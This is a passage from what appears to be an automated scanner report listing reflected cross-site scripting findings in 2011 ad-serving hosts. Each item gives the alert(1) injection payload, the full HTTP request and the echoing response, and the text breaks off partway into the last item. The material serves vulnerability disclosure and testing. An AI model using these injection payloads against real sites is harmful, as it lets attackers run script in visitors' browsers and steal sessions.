Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={}; truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM ...[SNIP]... om/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",icon_cam_mo:"http://choices.truste.com/assets/ad_choices_en.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c",cam:"2",cid:"0511wl728x90",optoutLink:"http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90&w=728&h=90",target:"over"}; truste.ca.bindingInitMap[te_clr1_8 ...[SNIP]...
4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-507/d3/jsc/fm.js
Issue detail
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57523'%3balert(1)//761ebfa4333 was submitted in the $ parameter. This input was echoed as 57523';alert(1)//761ebfa4333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x9057523'%3balert(1)//761ebfa4333&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=91:90:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2676
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';z="+Math.random();}
if(zzuid==' ...[SNIP]...
4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-507/d3/jsc/fm.js
Issue detail
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cd0e"-alert(1)-"31d922bac00 was submitted in the $ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x902cd0e"-alert(1)-"31d922bac00&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=89:88:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2754
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082"';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";z="+Math.random();}
if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';
var zzhasAd=undefined;
...[SNIP]...
4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-507/d3/jsc/fm.js
Issue detail
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82c2'%3balert(1)//7d572232822 was submitted in the q parameter. This input was echoed as c82c2';alert(1)//7d572232822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=c82c2'%3balert(1)//7d572232822&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'$0:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=77:76:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=23
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:45 GMT
Content-Length: 2750
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='c82c2';alert(1)//7d572232822,284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=c82c2';alert(1)//7d572232822,284b8'-alert(1)-'0 ...[SNIP]...
4.105. http://event.adxpose.com/event.flow [uid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://event.adxpose.com
Path: /event.flow
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 569f5<script>alert(1)</script>cbb22875fc7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2F3ps.go.com%2FDynamicAd%3Fsrvc%3Dabc%26adTypes%3DRectangles-Remnant%26url%3D%2Fshows%2Fcharlies-angels&uid=TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1316239136911-64316275808960200&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=214EE77DC665E937F45E21D15B56E7C0; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 17 Sep 2011 01:03:37 GMT
Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7");
4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://fw.adsafeprotected.com
Path: /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1f4"-alert(1)-"f4229a086fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7A00B96A0D964F453E5BD8D5810F10FB; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:59 GMT
Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPho ...[SNIP]...
4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://fw.adsafeprotected.com
Path: /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2023a"-alert(1)-"ff30b4aa7a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A971275997FA7630761B5092947B1A05; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome ...[SNIP]...
4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://fw.adsafeprotected.com
Path: /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
Issue detail
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db706"-alert(1)-"9cd6414e8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A049BAB0531C29E6EC384F93AA842C69; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome : "fal ...[SNIP]...
4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://fw.adsafeprotected.com
Path: /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
Issue detail
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114c3"-alert(1)-"fc47482de42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DB5C21D80F320C04F41B642CF20125A; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome : "false", ...[SNIP]...
4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: http://fw.adsafeprotected.com
Path: /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
Issue detail
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b6a7"-alert(1)-"c3bd8bd988d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1DCCDAFA24DD21FDF6463237374426AC; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:02 GMT Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000" ...[SNIP]...
4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fw.adsafeprotected.com |
| Path: | /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640d2"-alert(1)-"0338569564a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6B61580EFD1DC69FFF19E25E19111CA1; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:01 GMT Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhra ...[SNIP]...
4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fw.adsafeprotected.com |
| Path: | /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
